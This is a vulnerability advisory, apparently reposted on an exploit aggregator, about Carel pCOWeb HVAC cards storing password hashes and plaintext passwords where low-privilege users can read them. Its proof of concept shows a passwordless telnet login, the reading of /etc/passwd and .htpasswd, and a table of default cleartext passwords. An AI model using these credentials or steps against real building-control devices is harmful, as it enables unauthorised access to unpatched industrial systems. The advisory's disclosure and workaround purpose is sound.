Exploit for Carel pCOWeb HVAC Insecure Credential Storage CVE-2019-11369 CVE-2019-13553

Name: Exploit for Carel pCOWeb HVAC Insecure Credential Storage CVE-2019-11369 CVE-2019-13553
Rating: 5 (255 reviews)
2019-10-31 | CVSS 10.0
## https://sploitus.com/exploit?id=PACKETSTORM:155049
Advisory: Unsafe Storage of Credentials in Carel pCOWeb HVAC  
  
The Carel pCOWeb card stores password hashes in the file "/etc/passwd",  
allowing privilege escalation by authenticated users. Additionally,  
plaintext copies of the passwords are stored.  
  
  
Details  
=======  
  
Product: HVAC units using the OEM Carel pCOWeb Ethernet Control Interface  
Affected Versions: "A 1.4.11 - B 1.4.2", possibly others  
Fixed Versions: product obsolete  
Vulnerability Type: Credential Disclosure / Privilege Escalation  
Security Risk: low  
Vendor URL: https://www.carel.com/product/pcoweb-card  
Vendor Status: notified / product obsolete  
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-13  
Advisory Status: published  
CVE: GENERIC-MAP-NOMATCH  
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH  
  
  
Introduction  
============  
  
"The pCOWeb card is used to interface the pCO Sistema to networks that  
use the HVAC protocols based on the Ethernet physical standard, such as  
BACnet IP, Modbus TCP/IP and SNMP. The card also features an integrated  
Web-Server, which both contains the HTML pages relating to the specific  
application and allows a browser to be used for remote system  
management."  
(from the vendor's homepage)  
  
It is used as an OEM module in several different HVAC systems and  
considered obsolete by the vendor.  
  
  
More Details  
============  
  
The Carel pCOWeb interface provides user accounts with different levels  
of privileges. Despite the different privileges, other users, even the  
user nobody, are able to read the file "/etc/passwd" which contains the  
hashed passwords for all user accounts, especially those with more  
privileges. Additionally, a plaintext copy of all passwords is stored in  
the file /usr/local/root/flash/etc/sysconfig/userspwd, which is  
accessible from the web interface at the URL  
http://192.168.0.1/config/pw_changeusers.html  
This allows attackers with knowledge of one user account password to  
gain knowledge of the other accounts passwords, possibly gaining more  
privileges.  
  
  
Proof of Concept  
================  
  
Apart from a web interface, the Carel pCOWeb card provides a telnet  
interface accessible using a variety of default passwords and, in some  
cases, the user "nobody" without password:  
  
------------------------------------------------------------------------  
$ telnet 192.168.0.1  
Trying 192.168.0.1...  
Connected to 192.168.0.1.  
Escape character is '^]'.  
  
Linux 2.4.21-rmk1 (pCOWeb) (ttya0)  
  
  
pCOWeb login: nobody  
No directory /var/lib/nobody!  
Logging in with home = "/".  
Executing profile  
/usr/local/bin:/bin:/usr/bin  
[nobody@pCOWeb13:58:55 /]$ ls -la /etc/passwd  
-rw-r--r-- 1 root root 317 Jan 1 00:00 /etc/passwd  
[nobody@pCOWeb13:59:00 /]$ cat /etc/passwd  
root:o4jAwxNRjdSSk:0:0:root:/root:/bin/bash  
http::48:48:HTTP users:/usr/http/root:/bin/bash  
nobody::99:99:nobody:/var/lib/nobody:/bin/bash  
httpadmin:p4erNF6yyLx0U:200:200:httpadmin:/usr/local/root/http:/bin/bash  
carel:f4msfA.Ljf2Fo:500:500:carel:/home:/bin/bash  
guest:d4iIyYc5JrnxM:502:101:guest:/usr/bin:/bin/bash  
[nobody@pCOWeb13:59:32 /]$ cat /usr/local/root/admin/.htpasswd  
admin:7c3fxxrcHcwtc  
[nobody@pCOWeb13:59:33 /]$  
------------------------------------------------------------------------  
  
The following table lists the cleartext passwords for above  
password hashes:  
  
username | password  
----------------------  
root | froot  
httpadmin | fhttpadm  
carel | fcarel  
guest | fguest  
nobody | (none)  
admin | fadmin  
  
The passwords for the useraccounts "root", "httpadmin", "carel" and  
"guest" are documented in section 9.7.2 of the user manual [0], warning  
users:  
  
"it is important to set a password other than the default "froot" to  
prevent potentially dangerous outside access."  
  
  
It is possible that these default credentials are covered in  
CVE-2019-13553. Depending on firmware version and/or OEM modifications,  
some versions additionally allow Telnet login without password with the  
username "nobody" while it is disabled for other versions.  
  
The password for the web interface user "admin" is documented in section  
9.2.1 of the user manual [0].  
  
Additionally, some versions were seen with additional user credentials  
stored in the directory provided for OEM modifications of the web  
interface, such as the username "reserved" with the password "freserve"  
in "/usr/local/root/flash/http/reserved/.htpasswd".  
Storing some of these passwords in plaintext is covered in  
CVE-2019-11369.  
  
However, while the above passwords are stored in hashed form, the web  
interface at http://192.168.0.1/config/pw_changeusers.html shows them in  
plaintext. A file containing the plaintext passwords can be found in the  
filesystem:  
  
------------------------------------------------------------------------  
[root@pCOWeb14:02:14 /]# cat /usr/local/root/flash/etc/sysconfig/userspwd  
PROOT=froot  
PHTTP=fhttpadmin  
PGUEST=fguest  
PCAREL=fcarel  
------------------------------------------------------------------------  
  
  
Workaround  
==========  
  
Change all default passwords listed above and ensure the user "nobody"  
is disabled or has a password set.  
The Carel pCOWeb card should not be connected to networks accessible by  
untrusted users (compare advisory rt-sa-2019-014[1]).  
  
  
Fix  
===  
  
No updated firmware will be published for pCOWeb Cards, as they are  
obsolete since Dec 2017. A successor hardware with current firmware is  
available for OEM integrators.  
  
  
Security Risk  
=============  
  
Attackers with knowledge of one set of user credentials to a Carel  
pCOWeb card could use the password hashes accessible to all users in  
"/etc/passwd" or the plaintext copies of the passwords to gain  
different privileges. Due to the necessity of access to credentials,  
this is considered to pose a low risk only.  
  
  
Timeline  
========  
  
2019-07-17 Vulnerability identified  
2019-08-03 Customer approved disclosure to vendor  
2019-09-02 Vendor notified  
2019-09-09 Vendor did not respond as promised  
2019-09-17 Vendor could not be reached  
2019-09-18 Vendor could not be reached  
2019-09-18 Vendor could not be reached  
2019-10-28 Advisory published due to publication of CVE-2019-13553  
  
  
References  
==========  
  
[0] https://www.carel.com/documents/10191/0/+030220471/9619472f-f1c0-4ec9-a151-120aaa5e479a?version=1.0  
[1] https://www.redteam-pentesting.de/de/advisories/rt-sa-2019-014.txt  
  
  
RedTeam Pentesting GmbH  
=======================  
  
RedTeam Pentesting offers individual penetration tests performed by a  
team of specialised IT-security experts. Hereby, security weaknesses in  
company networks or products are uncovered and can be fixed immediately.  
  
As there are only few experts in this field, RedTeam Pentesting wants to  
share its knowledge and enhance the public knowledge with research in  
security-related areas. The results are made available as public  
security advisories.  
  
More information about RedTeam Pentesting can be found at:  
https://www.redteam-pentesting.de/  
  
  
Working at RedTeam Pentesting  
=============================  
  
RedTeam Pentesting is looking for penetration testers to join our team  
in Aachen, Germany. If you are interested please visit:  
https://www.redteam-pentesting.de/jobs/  
  
--   
RedTeam Pentesting GmbH Tel.: +49 241 510081-0  
Dennewartstr. 25-27 Fax : +49 241 510081-99  
52068 Aachen https://www.redteam-pentesting.de  
Germany Registergericht: Aachen HRB 14004  
Geschäftsführer: Patrick Hof, Jens Liebchen